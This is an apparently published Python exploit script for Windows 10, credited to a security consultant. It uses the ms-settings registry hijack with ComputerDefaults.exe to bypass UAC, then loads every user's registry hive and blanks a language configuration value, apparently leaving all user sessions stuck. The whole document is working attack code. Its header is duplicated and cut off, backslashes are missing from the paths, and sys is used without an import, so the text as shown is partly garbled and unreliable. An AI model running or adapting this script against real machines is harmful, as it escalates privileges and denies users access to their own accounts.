Microsoft Windows 10 User Sessions Stuck

#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas #!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# After microsoft's refusal to consider the issue as a security problem, I disclose the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#

from os import listdir, system, path
from ctypes import *
import _winreg

def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'SoftwareClassesms-settingsshellopencommand')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'SoftwareClassesms-settingsshellopencommand', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise

def bypass_uac():
try:
current=path.dirname(path.realpath(__file__)) + '\' + __file__
cmd="C:windowsSystem32cmd.exe /k c:python27python %s" %current
exec_bypass_uac(cmd)
system(r'C:windowssystem32ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)

def modify_reg_key(key, value):
try:
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control PanelDesktopLanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise


def modify_reg_key_Others(key, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00tControl PanelDesktopLanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

if __name__ == '__main__':
try:
sys32="c:\windows\system32\"
users="c:\users\"
exclude=["Public", "desktop.ini", "All Users"]

# Modify all users
if windll.Shell32.IsUserAnAdmin():
for i in listdir(users):
if i not in exclude:
system("reg.exe LOAD HKUw00t "+users+i+"NTUSER.DAT")
modify_reg_key_Others('', '')
system("reg.exe UNLOAD HKUw00t")

# Modify current user
modify_reg_key('', '')
else:
bypass_uac()
except WindowsError:
raise